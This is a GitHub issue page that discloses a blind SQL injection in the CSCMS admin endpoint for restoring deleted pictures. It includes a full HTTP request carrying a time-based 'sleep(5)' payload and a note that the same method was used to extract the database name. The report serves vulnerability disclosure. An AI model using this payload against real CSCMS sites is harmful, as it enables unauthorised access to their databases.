We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
there is a Injection vulnerability exists in pic_Pic.php_hy
Injection occurs when restoring deleted photos from the trash
GET /admin.php/pic/admin/pic/hy?id=3)and(sleep(5))--+ HTTP/1.1 Host: cscms.test Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://cscms.test/admin.php/pic/admin/pic?yid=3 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=o58jedqf4p0pobv4atdiuae0n6015865 Connection: close
Discovery success makes the server sleep,Construct payload,Then construct payload to blast database
Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Details
there is a Injection vulnerability exists in pic_Pic.php_hy
Injection occurs when restoring deleted photos from the trash
Discovery success makes the server sleep,Construct payload,Then construct payload to blast database
Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit
The text was updated successfully, but these errors were encountered: